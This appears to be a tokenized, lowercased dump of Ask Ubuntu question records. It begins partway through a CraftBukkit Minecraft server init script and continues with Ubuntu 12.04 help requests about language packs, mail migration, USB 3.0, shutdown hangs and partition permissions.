parallelgcthreads= $ cpu_count -xx : +aggressiveopts -jar $ service $ options '' me=`whoami` as_user ( ) { if [ $ me == $ username ] ; then bash -c `` $ 1 '' else su - $ username -c `` $ 1 '' fi } mc_start ( ) { if pgrep -u $ username -f $ service > /dev/null then echo `` $ service is already running ! '' else echo `` starting $ service ... '' cd $ mcpath as_user `` cd $ mcpath & & screen -dms craftbukkit $ invocation '' sleep 7 if pgrep -u $ username -f $ service > /dev/null then echo `` $ service is now running . '' else echo `` error ! could not start $ service ! '' fi fi } mc_saveoff ( ) { if pgrep -u $ username -f $ service > /dev/null then echo `` $ service is running ... suspending saves '' as_user `` screen -p 0 -s craftbukkit -x eval 'stuff \ '' say the server is preforming a backup . server going to read-only mode . do not build ... \ '' \015 ' '' as_user `` screen -p 0 -s craftbukkit -x eval 'stuff \ '' save-off\ '' \015 ' '' as_user `` screen -p 0 -s craftbukkit -x eval 'stuff \ '' save-all\ '' \015 ' '' sync sleep 10 else echo `` $ service is not running . not suspending saves . '' fi } mc_save ( ) { if pgrep -u $ username -f $ service > /dev/null then echo `` $ service is running ... saving worlds ... '' as_user `` screen -p 0 -s craftbukkit -x eval 'stuff \ '' save-all\ '' \015 ' '' sync sleep 10 echo `` save complete ! '' else echo `` $ service is not running . can not save ! '' fi } mc_saveon ( ) { if pgrep -u $ username -f $ service > /dev/null then echo `` $ service is running ... re-enabling saves '' as_user `` screen -p 0 -s craftbukkit -x eval 'stuff \ '' save-on\ '' \015 ' '' as_user `` screen -p 0 -s craftbukkit -x eval 'stuff \ '' say server backup has completed . server going to read-write mode . you can now continue building ... \ '' \015 ' '' else echo `` $ service is not running . not resuming saves . '' fi } mc_stop ( ) { if pgrep -u $ username -f $ service > /dev/null then echo `` stopping $ service '' as_user `` screen -p 0 -s craftbukkit -x eval 'stuff \ '' say $ servername is shutting down in 30 seconds ! please stop what you are doing . check back later , we 'll be back ! \ '' \015 ' '' as_user `` screen -p 0 -s craftbukkit -x eval 'stuff \ '' save-all\ '' \015 ' '' sleep 30 as_user `` screen -p 0 -s craftbukkit -x eval 'stuff \ '' stop\ '' \015 ' '' sleep 7 else echo `` $ service was not running . '' fi if pgrep -u $ username -f $ service > /dev/null then echo `` error ! $ service could not be stopped . '' else echo `` $ service is stopped . '' fi } mc_update ( ) { if pgrep -u $ username -f $ service > /dev/null then echo `` $ service is running ! will not start update . '' else mc_server_url=http : //dl.bukkit.org/latest-rb/craftbukkit.jar as_user `` cd $ mcpath & & wget -q -o $ mcpath/craftbukkit_server.jar.update $ mc_server_url '' if [ -f $ mcpath/craftbukkit_server.jar.update ] then if `diff $ mcpath/ $ service $ mcpath/craftbukkit_server.jar.update > /dev/null` then echo `` you are already running the latest version of $ service . update anyway ? [ y/n ] '' select yn in `` yes '' `` no '' ; do case $ yn in yes ) as_user `` mv $ mcpath/ $ service $ mcpath/ $ { service } _old.jar '' as_user `` mv $ mcpath/craftbukkit_server.jar.update $ mcpath/ $ service '' echo `` $ service updated successfully ! `` ; break ; ; no ) echo `` the update was not installed ! removing temporary files and exiting ... '' as_user `` rm $ mcpath/craftbukkit_server.jar.update '' exit ; ; esac done else as_user `` mv $ mcpath/ $ service $ mcpath/ $ { service } _old.jar '' as_user `` mv $ mcpath/craftbukkit_server.jar.update $ mcpath/ $ service '' echo `` $ service updated successfully ! '' fi else echo `` $ service update could not be downloaded . '' fi fi } mc_addplugin ( ) { if pgrep -u $ username -f $ service > /dev/null then echo `` $ service is running ! please stop the service before adding a plugin . '' else echo `` paste the url to the .jar plugin ... '' read jarurl jarname= $ ( basename `` $ jarurl '' ) if [ -d `` $ tempplugins '' ] then as_user `` cd $ pluginspath & & wget -r -a.jar $ jarurl -o temp_plugins/ $ jarname '' else as_user `` cd $ pluginspath & & mkdir $ tempplugins & & wget -r -a.jar $ jarurl -o temp_plugins/ $ jarname '' fi if [ -f `` $ tmpdir/ $ jarname '' ] then if [ -f `` $ pluginspath/ $ jarname '' ] then if `diff $ pluginspath/ $ jarname $ tmpdir/ $ jarname > /dev/null` then echo `` you are already running the latest version of $ jarname . '' else now=`date `` + % y- % m- % d_ % hh % m '' ` echo `` are you sure you want to overwrite this plugin ? [ y/n ] '' echo `` note : your old plugin will be moved to the `` $ tempplugins '' folder with todays date . '' select yn in `` yes '' `` no '' ; do case $ yn in yes ) as_user `` mv $ pluginspath/ $ jarname $ tempplugins/ $ { jarname } _ $ { now } & & mv $ tempplugins/ $ jarname $ pluginspath/ $ jarname '' ; break ; ; no ) echo `` the plugin has not been installed ! removing temporary plugin and exiting ... '' as_user `` rm $ tempplugins/ $ jarname '' ; exit ; ; esac done echo `` would you like to start the $ service now ? [ y/n ] '' select yn in `` yes '' `` no '' ; do case $ yn in yes ) mc_start ; break ; ; no ) `` $ service not running ! to start the service run : /etc/init.d/craftbukkit start '' ; exit ; ; esac done fi else echo `` are you sure you want to add this new plugin ? [ y/n ] '' select yn in `` yes '' `` no '' ; do case $ yn in yes ) as_user `` mv $ pluginspath/ $ jarname $ tempplugins/ $ { jarname } _ $ { now } & & mv $ tempplugins/ $ jarname $ pluginspath/ $ jarname '' ; break ; ; no ) echo `` the plugin has not been installed ! removing temporary plugin and exiting ... '' as_user `` rm $ tempplugins/ $ jarname '' ; exit ; ; esac done echo `` would you like to start the $ service now ? [ y/n ] ? '' select yn in `` yes '' `` no '' ; do case $ yn in yes ) mc_start ; break ; ; no ) `` $ service not running ! to start the service run : /etc/init.d/craftbukkit start '' ; exit ; ; esac done fi else echo `` failed to download the plugin from the url you specified ! '' exit ; fi fi } mc_scanplugins ( ) { if [ `` $ ( ls -a $ pluginspath ) '' ] then shopt -s nullglob plugins= ( $ pluginspath/*.jar ) i=1 for f in `` $ { plugins [ @ ] } '' do echo `` $ { i } : $ f '' plugin [ $ i ] = $ f i= $ ( ( $ i + 1 ) ) done echo `` enter the id of a plugin you want removed , or any other key to cancel . '' read input if [ ! -z `` $ { input # # * [ ! 0-9 ] * } '' ] then if [ -f `` $ { plugin [ input ] } '' ] then echo `` removing plugin ... '' jar= $ ( basename $ { plugin [ input ] } ) jarname= $ { jar % .jar } as_user `` rm -f $ { plugin [ input ] } '' sleep 2 as_user `` cd $ pluginspath & & rm -rf ./ $ { jarname } '' if [ -f `` $ { pluginspath } / $ { jarname } '' ] then echo `` plugin folder could not be removed ... '' fi echo `` plugin removed . '' else echo `` $ { plugin [ input ] } '' echo `` invalid plugin ! does not exist ! canceling ... '' exit ; fi else echo `` canceling ... '' exit ; fi else echo `` you have no plugins installed . '' exit ; fi } mc_backup ( ) { mc_saveoff for i in `` $ { worlds [ @ ] } '' ; do now=`date `` + % y- % m- % d_ % hh % m '' ` backup_file= '' $ backuppath/ $ { i } _ $ { now } .tar '' echo `` backing up world : $ i ... '' # as_user `` cd $ mcpath & & cp -r $ i $ backuppath/ $ { i } _`date `` + % y. % m. % d_ % h. % m '' '' ` as_user `` tar -c \ '' $ mcpath\ '' -cf \ '' $ backup_file\ '' $ i '' done echo `` backing up $ service '' as_user `` tar -c \ '' $ mcpath\ '' -rf \ '' $ backup_file\ '' $ service '' # as_user `` cp \ '' $ mcpath/ $ service\ '' \ '' $ backuppath/craftbukkit_server_ $ { now } .jar\ '' '' mc_saveon echo `` compressing backup ... '' as_user `` tar -cvzf $ backuppath/server_backup_ $ { now } .tar.gz $ mcpath '' echo `` backup has completed successfully . '' } mc_command ( ) { command= '' $ 1 '' ; if pgrep -u $ username -f $ service > /dev/null then pre_log_len=`wc -l `` $ mcpath/server.log '' | awk ' { print $ 1 } '` echo `` $ service is running ... executing command '' as_user `` screen -p 0 -s craftbukkit -x eval 'stuff \ '' $ command\ '' \015 ' '' sleep .1 # assumes that the command will run and print to the log file in less than .1 seconds # print output tail -n $ [ `wc -l `` $ mcpath/server.log '' | awk ' { print $ 1 } '`- $ pre_log_len ] `` $ mcpath/server.log '' fi } # start-stop here case `` $ 1 '' in start ) mc_start ; ; stop ) mc_stop ; ; restart ) mc_stop mc_start ; ; save ) mc_save ; ; update ) mc_stop mc_backup mc_update mc_start ; ; scanplugins ) mc_scanplugins ; ; addplugin ) mc_addplugin ; ; backup ) mc_backup ; ; status ) if pgrep -u $ username -f $ service > /dev/null then echo `` $ service is running . '' else echo `` $ service is not running . '' fi ; ; command ) if [ $ # -gt 1 ] ; then shift mc_command `` $ * '' else echo `` must specify server command ( try 'help ' ? ) '' fi ; ; * ) echo `` usage : $ 0 { start|stop|update|backup|status|restart|command \ '' server command\ '' } '' exit 1 ; ; esac exit 0
161833	am not able to add languages to my new ubuntu 12.04 installation	i have a freshly installed ubuntu 12.04 i need to install telugu language ( i have been using it successfully in my earlier ubuntu 11.04 ) . but the language support is saying : software database is brocken- you can not add or delete any package ... i looked up in the net , updated and upgraded the system as suggested , to no avail . it looked like the problem is with the default locale . i tried this too : sudo dpkg-reconfigure locales [ sudo ] password for narayana : generating locales ... en_ag.utf-8 ... up-to-date en_au.utf-8 ... up-to-date en_bw.utf-8 ... up-to-date en_ca.utf-8 ... up-to-date en_dk.utf-8 ... up-to-date en_gb.utf-8 ... up-to-date en_hk.utf-8 ... up-to-date en_ie.utf-8 ... up-to-date en_in.utf-8 ... up-to-date en_ng.utf-8 ... up-to-date en_nz.utf-8 ... up-to-date en_ph.utf-8 ... up-to-date en_sg.utf-8 ... up-to-date en_us.utf-8 ... up-to-date en_za.utf-8 ... up-to-date en_zm.utf-8 ... up-to-date en_zw.utf-8 ... up-to-date generation complete . narayana @ subhan : ~ $ sudo apt-get -- reinstall install language-pack-te reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : language-pack-te : depends : language-pack-te-base ( > = 1:12.04+20120508 ) but it is not going to be installed e : unable to correct problems , you have held broken packages . dint ' gain much- did i ? please help . ( by the way the ubuntu software manager is able to install other software like gimp etc )
161841	need to import mail but can not execute evolution	my 11.10 installation is broken ( long story ) and i can not boot to it . i have installed 12.04 on a separate partition , and can mount the drive containing my old evolution files . what i want to do is : import all the data from my old ( 11.10 ) evolution location ( ~/.local/john/share/evolution is the location i 've seen in other posts , but i 'm not sure which sub-folders i need ) into evolution on the new ( 12.04 ) partition . since the old os is totally hosed , i ca n't boot to it in order to use evolution 's functionality to export and move folders around , etc , like i 've seen in other posts . any suggestions on how i can rescue all the emails and contains from the old location would be greatly appreciated ! ps . i have a pop account and a gmail account at the old install . the gmail i 'm not too worried about , but the pop mail is no longer on my isp server , so i need a way to save it from the old location . edit : i do n't care whether i end up with evolution or thunderbird as a result - whichever will work to import or migrate the old emails .
161845	problems while installing ubuntu 12.04 64 & 32 bits from livecd	i am trying to install ubuntu on my new pc but i am encountering problems . when i boot from the installation cd , everything runs fine until the `` window '' when the user has to decide to try ubuntu or install it in the machine . well that `` window '' appears in blank , and my mouse and keyboard behaves really slow . i ca n't do anything , so i have to shut it down by pressing power button . the specification of my pc are this motherboard : gigabyte ex58 ud7 cpu : i7 950 hd : western digital caviar black int . memory : 6gb memory corsair graphics : evga gtx580 i really need to install ubuntu or another linux distribution , i am using de seismic unix program { edit : guess it is this } on my laptop . i hope someone can help me .
161847	desktop ca n't delete file because thunar was replaced by nautilus ( xubuntu 12.04 )	my problem is really simple : i 've replaced thunar with nautilus in my xubuntu 12.04 installation ( 64 bit ) ; i removed thunar completely . everything works fine in the computer except for the desktop : if i try to delete a file that is in the desktop for example , the attempt fails complaining of thunar not being installed on the system . if i reinstall thunar everything works as expected , but i do n't want to keep thunar on the system . how to fix this ? thanks !
161851	how do i use 'notify-send ' to immediately replace an existing notification ?	when i use notify-send to show a notification on the desktop , and then use it again to show a different notification , i have noticed that the second one only shows after the first one has disappeared . is there a way to get notify-send to immediately replace an existing notification with a different one ?
161854	ubuntu 12.04 uses almost 4 gb of memory right after startup .	just recently my laptop has started behaving weird . it often hangs after a short while of using it ( perhaps half an hour ) , and memory usage is very high . i have 4 gb of memory , and after startup it often uses around 3.8 gb of memory . this screenshot shows what processes are running and how much memory is used : http : //postimage.org/image/nk4muoxel/ i do n't think i have installed any new software before this started happening , and i ca n't think of anything else causing it . my laptop is a few years old now and perhaps it is n't of the best quality , but i do n't know if it 's possible that some hardware problem could be causing this . any ideas ?
161859	shows `` unable to locate package unzip '' error	i have installed ubuntu 12.04 server , shows e : unable to locate the package unzip the above error is also shown , if i try to install packages also . can any one help me out to get out from this error .
161862	nec upd720200 usb 3.0 not working on ubuntu 12.04	i 've recently installed ubuntu 12.04 64-bit on a hp envy 15 1104tx . most stuff appears to be working fine with the exception of the two usb3 ports ( usb2 port works fine ) . i 've read a lot of articles but so far have not been able to find a solution . i 've tried adding 'pci=nomsi ' to '/etc/default/grub ' but this made no difference . some articles suggest booting into windows and upgrading the firmware on the upd720200 . any body had any experience of this ? is there a way i can checked the firmware version of the nec upd720200 in linux to see if there is an update available ? any help appreciated . uname -a : linux hp-envy-15-1104tx 3.2.0-26-generic # 41-ubuntu smp thu jun 14 17:49:24 utc 2012 x86_64 x86_64 x86_64 gnu/linux lshw : hp-envy-15-1104tx description : notebook product : hp envy 15 notebook pc ( wf591pa # abg ) vendor : hewlett-packard version : 0492110000241910001420000 serial : cnf0301c79 width : 64 bits capabilities : smbios-2.6 dmi-2.6 vsyscall32 configuration : boot=normal chassis=notebook family=103c_5335kv sku=wf591pa # abg uuid=434e4630-3330-3143-3739-60eb6906688f *-core description : motherboard product : 1522 vendor : hewlett-packard physical id : 0 version : 36.35 serial : cnf0301c79 slot : base board chassis location *-firmware description : bios vendor : hewlett-packard physical id : 0 version : f.2b date : 10/12/2010 size : 1mib capacity : 1472kib capabilities : pci upgrade shadowing cdboot bootselect edd int13floppynec int13floppytoshiba int13floppy360 int13floppy1200 int13floppy720 int13floppy2880 int9keyboard int10video acpi usb biosbootspecification *-memory description : system memory physical id : 13 slot : system board or motherboard size : 16gib *-bank:0 description : sodimm ddr3 synchronous 1333 mhz ( 0.8 ns ) product : 9905428-043.a00lf physical id : 0 serial : e13c4316 slot : bottom size : 4gib width : 64 bits clock : 1333mhz ( 0.8ns ) *-bank:1 description : sodimm ddr3 synchronous 1333 mhz ( 0.8 ns ) product : 9905428-043.a00lf physical id : 1 serial : e03c3e16 slot : bottom size : 4gib width : 64 bits clock : 1333mhz ( 0.8ns ) *-bank:2 description : sodimm ddr3 synchronous 1333 mhz ( 0.8 ns ) product : 9905428-043.a00lf physical id : 2 serial : 672279cc slot : on board size : 4gib width : 64 bits clock : 1333mhz ( 0.8ns ) *-bank:3 description : sodimm ddr3 synchronous 1333 mhz ( 0.8 ns ) product : 9905428-043.a00lf physical id : 3 serial : 652286cc slot : on board size : 4gib width : 64 bits clock : 1333mhz ( 0.8ns ) *-cpu description : cpu product : intel ( r ) core ( tm ) i7 cpu q 820 @ 1.73ghz vendor : intel corp. physical id : 1d bus info : cpu @ 0 version : intel ( r ) core ( tm ) i7 cpu q 820 @ 1.73ghz slot : cpu size : 1199mhz capacity : 1199mhz width : 64 bits clock : 1066mhz capabilities : x86-64 fpu fpu_exception wp vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx rdtscp constant_tsc arch_perfmon pebs bts rep_good nopl xtopology nonstop_tsc aperfmperf pni dtes64 monitor ds_cpl vmx smx est tm2 ssse3 cx16 xtpr pdcm sse4_1 sse4_2 popcnt lahf_lm ida tpr_shadow vnmi flexpriority ept vpid cpufreq configuration : cores=4 enabledcores=4 threads=8 *-cache:0 description : l3 cache physical id : 1e slot : l3 cache size : 8mib capacity : 8mib capabilities : synchronous internal write-through unified *-cache:1 description : l2 cache physical id : 20 slot : l2 cache size : 256kib capacity : 256kib capabilities : synchronous internal write-through unified *-cache:2 description : l1 cache physical id : 21 slot : l1 cache size : 32kib capacity : 32kib capabilities : synchronous internal write-through instruction *-cache description : l1 cache physical id : 1f slot : l1 cache size : 32kib capacity : 32kib capabilities : synchronous internal write-through data *-pci:0 description : host bridge product : core processor dmi vendor : intel corporation physical id : 100 bus info : pci @ 0000:00:00.0 version : 11 width : 32 bits clock : 33mhz *-pci:0 description : pci bridge product : core processor pci express root port 1 vendor : intel corporation physical id : 3 bus info : pci @ 0000:00:03.0 version : 11 width : 32 bits clock : 33mhz capabilities : pci msi pciexpress pm normal_decode bus_master cap_list configuration : driver=pcieport resources : irq:16 ioport:4000 ( size=4096 ) memory : d4100000-d41fffff ioport : c0000000 ( size=268435456 ) *-display description : vga compatible controller product : broadway pro [ mobility radeon hd 5800 series ] vendor : hynix semiconductor ( hyundai electronics ) physical id : 0 bus info : pci @ 0000:01:00.0 version : 00 width : 64 bits clock : 33mhz capabilities : pm pciexpress msi vga_controller bus_master cap_list rom configuration : driver=fglrx_pci latency=0 resources : irq:58 memory : c0000000-cfffffff memory : d4100000-d411ffff ioport:4000 ( size=256 ) memory : d4140000-d415ffff *-multimedia description : audio device product : juniper hdmi audio [ radeon hd 5700 series ] vendor : hynix semiconductor ( hyundai electronics ) physical id : 0.1 bus info : pci @ 0000:01:00.1 version : 00 width : 64 bits clock : 33mhz capabilities : pm pciexpress msi bus_master cap_list configuration : driver=snd_hda_intel latency=0 resources : irq:56 memory : d4120000-d4123fff *-pci:1 description : pci bridge product : core processor pci express root port 3 vendor : intel corporation physical id : 5 bus info : pci @ 0000:00:05.0 version : 11 width : 32 bits clock : 33mhz capabilities : pci msi pciexpress pm normal_decode bus_master cap_list configuration : driver=pcieport resources : irq:16 memory : d4000000-d40fffff *-usb description : usb controller product : upd720200 usb 3.0 host controller vendor : nec corporation physical id : 0 bus info : pci @ 0000:02:00.0 version : 03 width : 64 bits clock : 33mhz capabilities : pm msi msix pciexpress xhci bus_master cap_list configuration : driver=xhci_hcd latency=0 resources : irq:16 memory : d4000000-d4001fff *-generic:0 unclaimed description : system peripheral product : core processor system management registers vendor : intel corporation physical id : 8 bus info : pci @ 0000:00:08.0 version : 11 width : 32 bits clock : 33mhz capabilities : pciexpress cap_list configuration : latency=0 *-generic:1 unclaimed description : system peripheral product : core processor semaphore and scratchpad registers vendor : intel corporation physical id : 8.1 bus info : pci @ 0000:00:08.1 version : 11 width : 32 bits clock : 33mhz capabilities : pciexpress cap_list configuration : latency=0 *-generic:2 unclaimed description : system peripheral product : core processor system control and status registers vendor : intel corporation physical id : 8.2 bus info : pci @ 0000:00:08.2 version : 11 width : 32 bits clock : 33mhz capabilities : pciexpress cap_list configuration : latency=0 *-generic:3 unclaimed description : system peripheral product : core processor miscellaneous registers vendor : intel corporation physical id : 8.3 bus info : pci @ 0000:00:08.3 version : 11 width : 32 bits clock : 33mhz configuration : latency=0 *-generic:4 unclaimed description : system peripheral product : core processor qpi link vendor : intel corporation physical id : 10 bus info : pci @ 0000:00:10.0 version : 11 width : 32 bits clock : 33mhz configuration : latency=0 *-generic:5 unclaimed description : system peripheral product : core processor qpi routing and protocol registers vendor : intel corporation physical id : 10.1 bus info : pci @ 0000:00:10.1 version : 11 width : 32 bits clock : 33mhz configuration : latency=0 *-multimedia description : audio device product : 5 series/3400 series chipset high definition audio vendor : intel corporation physical id : 1b bus info : pci @ 0000:00:1b.0 version : 05 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : driver=snd_hda_intel latency=0 resources : irq:55 memory : d4200000-d4203fff *-pci:2 description : pci bridge product : 5 series/3400 series chipset pci express root port 1 vendor : intel corporation physical id : 1c bus info : pci @ 0000:00:1c.0 version : 05 width : 32 bits clock : 33mhz capabilities : pci pciexpress msi pm normal_decode bus_master cap_list configuration : driver=pcieport resources : irq:17 ioport:3000 ( size=4096 ) memory : d3000000-d3ffffff ioport : d0000000 ( size=16777216 ) *-network description : wireless interface product : centrino advanced-n 6200 vendor : intel corporation physical id : 0 bus info : pci @ 0000:03:00.0 logical name : wlan0 version : 35 serial : 00:27:10:40 : e4:68 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=iwlwifi driverversion=3.2.0-26-generic firmware=9.221.4.1 build 25532 latency=0 link=no multicast=yes wireless=ieee 802.11abgn resources : irq:54 memory : d3000000-d3001fff *-pci:3 description : pci bridge product : 5 series/3400 series chipset pci express root port 2 vendor : intel corporation physical id : 1c.1 bus info : pci @ 0000:00:1c.1 version : 05 width : 32 bits clock : 33mhz capabilities : pci pciexpress msi pm normal_decode bus_master cap_list configuration : driver=pcieport resources : irq:16 ioport:2000 ( size=4096 ) memory : d2000000-d2ffffff ioport : d1000000 ( size=16777216 ) *-network description : ethernet interface product : ar8131 gigabit ethernet vendor : atheros communications inc. physical id : 0 bus info : pci @ 0000:04:00.0 logical name : eth0 version : c0 serial : 60 : eb:69:06:68:8f size : 1gbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress vpd bus_master cap_list ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=atl1c driverversion=1.0.1.0-napi duplex=full firmware=n/a ip=10.161.0.147 latency=0 link=yes multicast=yes port=twisted pair speed=1gbit/s resources : irq:57 memory : d2000000-d203ffff ioport:2000 ( size=128 ) *-usb description : usb controller product : 5 series/3400 series chipset usb2 enhanced host controller vendor : intel corporation physical id : 1d bus info : pci @ 0000:00:1d.0 version : 05 width : 32 bits clock : 33mhz capabilities : pm debug ehci bus_master cap_list configuration : driver=ehci_hcd latency=0 resources : irq:20 memory : d4205800-d4205bff *-pci:4 description : pci bridge product : 82801 mobile pci bridge vendor : intel corporation physical id : 1e bus info : pci @ 0000:00:1e.0 version : a5 width : 32 bits clock : 33mhz capabilities : pci subtractive_decode bus_master cap_list *-isa description : isa bridge product : mobile 5 series chipset lpc interface controller vendor : intel corporation physical id : 1f bus info : pci @ 0000:00:1f.0 version : 05 width : 32 bits clock : 33mhz capabilities : isa bus_master cap_list configuration : latency=0 *-storage description : raid bus controller product : 82801 mobile sata controller [ raid mode ] vendor : intel corporation physical id : 1f.2 bus info : pci @ 0000:00:1f.2 logical name : scsi0 version : 05 width : 32 bits clock : 66mhz capabilities : storage msi pm bus_master cap_list emulated configuration : driver=ahci latency=0 resources : irq:45 ioport:5048 ( size=8 ) ioport:5054 ( size=4 ) ioport:5040 ( size=8 ) ioport:5050 ( size=4 ) ioport:5020 ( size=32 ) memory : d4205000-d42057ff *-disk description : ata disk product : ocz-vertex3 physical id : 0.0.0 bus info : scsi @ 0:0.0.0 logical name : /dev/sda version : 2.15 serial : ocz-0350p6h316x5kuqe size : 223gib ( 240gb ) capabilities : partitioned partitioned : dos configuration : ansiversion=5 signature=000592dd *-volume:0 description : ext4 volume vendor : linux physical id : 1 bus info : scsi @ 0:0.0.0,1 logical name : /dev/sda1 logical name : / version : 1.0 serial : e741f18c-cfc5-4bce-b1e7-f80e517a3a22 size : 207gib capacity : 207gib capabilities : primary bootable journaled extended_attributes large_files huge_files dir_nlink recover extents ext4 ext2 initialized configuration : created=2012-06-15 06:49:27 filesystem=ext4 lastmountpoint=/ modified=2012-06-14 21:23:42 mount.fstype=ext4 mount.options=rw , relatime , errors=remount-ro , user_xattr , barrier=1 , data=ordered mounted=2012-07-10 16:18:20 state=mounted *-volume:1 description : extended partition physical id : 2 bus info : scsi @ 0:0.0.0,2 logical name : /dev/sda2 size : 15gib capacity : 15gib capabilities : primary extended partitioned partitioned : extended *-logicalvolume description : linux swap / solaris partition physical id : 5 logical name : /dev/sda5 capacity : 15gib capabilities : nofs *-serial unclaimed description : smbus product : 5 series/3400 series chipset smbus controller vendor : intel corporation physical id : 1f.3 bus info : pci @ 0000:00:1f.3 version : 05 width : 64 bits clock : 33mhz configuration : latency=0 resources : memory : d4205c00-d4205cff ioport:5000 ( size=32 ) *-pci:1 description : host bridge product : core processor quickpath architecture generic non-core registers vendor : intel corporation physical id : 101 bus info : pci @ 0000 : ff:00.0 version : 04 width : 32 bits clock : 33mhz *-pci:2 description : host bridge product : core processor quickpath architecture system address decoder vendor : intel corporation physical id : 102 bus info : pci @ 0000 : ff:00.1 version : 04 width : 32 bits clock : 33mhz *-pci:3 description : host bridge product : core processor qpi link 0 vendor : intel corporation physical id : 103 bus info : pci @ 0000 : ff:02.0 version : 04 width : 32 bits clock : 33mhz *-pci:4 description : host bridge product : core processor qpi physical 0 vendor : intel corporation physical id : 104 bus info : pci @ 0000 : ff:02.1 version : 04 width : 32 bits clock : 33mhz *-pci:5 description : host bridge product : core processor integrated memory controller vendor : intel corporation physical id : 105 bus info : pci @ 0000 : ff:03.0 version : 04 width : 32 bits clock : 33mhz *-pci:6 description : host bridge product : core processor integrated memory controller target address decoder vendor : intel corporation physical id : 106 bus info : pci @ 0000 : ff:03.1 version : 04 width : 32 bits clock : 33mhz *-pci:7 description : host bridge product : core processor integrated memory controller test registers vendor : intel corporation physical id : 107 bus info : pci @ 0000 : ff:03.4 version : 04 width : 32 bits clock : 33mhz *-pci:8 description : host bridge product : core processor integrated memory controller channel 0 control registers vendor : intel corporation physical id : 108 bus info : pci @ 0000 : ff:04.0 version : 04 width : 32 bits clock : 33mhz *-pci:9 description : host bridge product : core processor integrated memory controller channel 0 address registers vendor : intel corporation physical id : 109 bus info : pci @ 0000 : ff:04.1 version : 04 width : 32 bits clock : 33mhz *-pci:10 description : host bridge product : core processor integrated memory controller channel 0 rank registers vendor : intel corporation physical id : 10a bus info : pci @ 0000 : ff:04.2 version : 04 width : 32 bits clock : 33mhz *-pci:11 description : host bridge product : core processor integrated memory controller channel 0 thermal control registers vendor : intel corporation physical id : 10b bus info : pci @ 0000 : ff:04.3 version : 04 width : 32 bits clock : 33mhz *-pci:12 description : host bridge product : core processor integrated memory controller channel 1 control registers vendor : intel corporation physical id : 10c bus info : pci @ 0000 : ff:05.0 version : 04 width : 32 bits clock : 33mhz *-pci:13 description : host bridge product : core processor integrated memory controller channel 1 address registers vendor : intel corporation physical id : 10d bus info : pci @ 0000 : ff:05.1 version : 04 width : 32 bits clock : 33mhz *-pci:14 description : host bridge product : core processor integrated memory controller channel 1 rank registers vendor : intel corporation physical id : 10e bus info : pci @ 0000 : ff:05.2 version : 04 width : 32 bits clock : 33mhz *-pci:15 description : host bridge product : core processor integrated memory controller channel 1 thermal control registers vendor : intel corporation physical id : 10f bus info : pci @ 0000 : ff:05.3 version : 04 width : 32 bits clock : 33mhz *-battery description : lithium ion battery product : nk06053 vendor : smp-atl24 physical id : 1 slot : primary capacity : 4800mwh configuration : voltage=11.1v lspci : 02:00.0 usb controller : nec corporation upd720200 usb 3.0 host controller ( rev 03 ) ( prog-if 30 [ xhci ] ) subsystem : hewlett-packard company device 1522 flags : bus master , fast devsel , latency 0 , irq 16 memory at d4000000 ( 64-bit , non-prefetchable ) [ size=8k ] capabilities : [ 50 ] power management version 3 capabilities : [ 70 ] msi : enable- count=1/8 maskable- 64bit+ capabilities : [ 90 ] msi-x : enable+ count=8 masked- capabilities : [ a0 ] express endpoint , msi 00 capabilities : [ 100 ] advanced error reporting capabilities : [ 140 ] device serial number ff-ff-ff-ff-ff-ff-ff-ff capabilities : [ 150 ] latency tolerance reporting kernel driver in use : xhci_hcd lsusb ( with thumb drive plugged into usb3 port ) : bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 001 device 002 : id 8087:0020 intel corp . integrated rate matching hub bus 001 device 003 : id 5986:01d0 acer , inc bus 001 device 004 : id 03f0:231d hewlett-packard
161864	ubuntu 12.04 does not shut down at all and gets stuck on 3 or 4 dots	ubuntu 12.04 does not shut down at all and gets stuck on 3 or 4 dots . i am using a pc with pentium 4 processor , 1.9ghz , 1gb ram . i tried using the command sudo shutdown now , but it gets stuck again at the logo screen with dots . and none of the answers seem to help me here . please help with a gentler solution to shut down . but restart works fine , the problem is only with shutting down .
161866	how to access files in old ubuntu installation , from new ubuntu intallation .	after messing up with my permission settings in 12.04 , i installed a fresh copy of ubuntu and now i have 3 operating systems on my pc , i was wondering if i could access previously installed ubuntu from the newly installed ubuntu , is there a way where i can could get my permissions back and would be able to use sudo command in the previous ubuntu installation ? to see what exactly i messed up , you can go through this question .
161870	how can i batch compress and decompress monkey 's audio in ubuntu ?	i am using the command mac in terminal to compress and decompress monkey 's audio files . however , i want to find a way to do it to more than one file at a time . is there a trick for the mac program that i do n't know , or is there another program that can help ? i 'm stuck using the window 's gui under wine . help free me from this : )
161872	how to grant standard users access to disk partitions and flash storage ?	i have a partition that i need standard users ( not administrators ) to have read/write access to . however , this partition does not even appear to them as it does to me as an administrator . how can i make it so that standard users can read/write to this partition ? it would be nice if they could have the ability to mount it if needed . i have the same problem with removable media - if i have a flash card in the computer , the standard users can not see this storage media .
